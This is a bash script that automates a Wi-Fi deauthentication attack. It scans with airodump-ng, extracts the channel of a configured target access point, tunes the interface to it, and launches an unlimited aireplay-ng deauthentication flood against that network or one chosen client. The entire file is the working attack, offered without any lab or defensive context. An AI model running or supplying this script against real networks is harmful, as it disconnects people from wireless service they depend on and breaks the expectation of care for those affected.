#!/bin/bash

source ./config.cfg

rm tempdump*

echo "Dumping data"
airodump-ng -w tempdump --output-format csv --write-interval 3 --background 1 $IFACE & sleep 5 && killall airodump-ng

echo "Preparing data"
mv tempdump-01.csv tempdump.csv

echo "Grepping data"
TARGET_CHANNEL=$(grep "$TARGET_BSSID" tempdump.csv | awk -F, '{sub(/^ *| *$/,"",$4); print $4}')

if [ -z "$TARGET_CHANNEL" ]; then
  echo "Target channel is not found. Exiting."
  exit 1
fi

TARGET_CHANNEL="${TARGET_CHANNEL:0:2}"

echo "Automated targeting..."
echo "Target BSSID = $TARGET_BSSID"
echo "Target channel = $TARGET_CHANNEL"

iwconfig $IFACE channel $TARGET_CHANNEL

if [ -z "$TARGET_DEVICE" ]
then
    aireplay-ng -0 0 -a $TARGET_BSSID $IFACE --ignore-negative-one
else
    aireplay-ng -0 0 -a $TARGET_BSSID -c $TARGET_DEVICE $IFACE --ignore-negative-one
fi
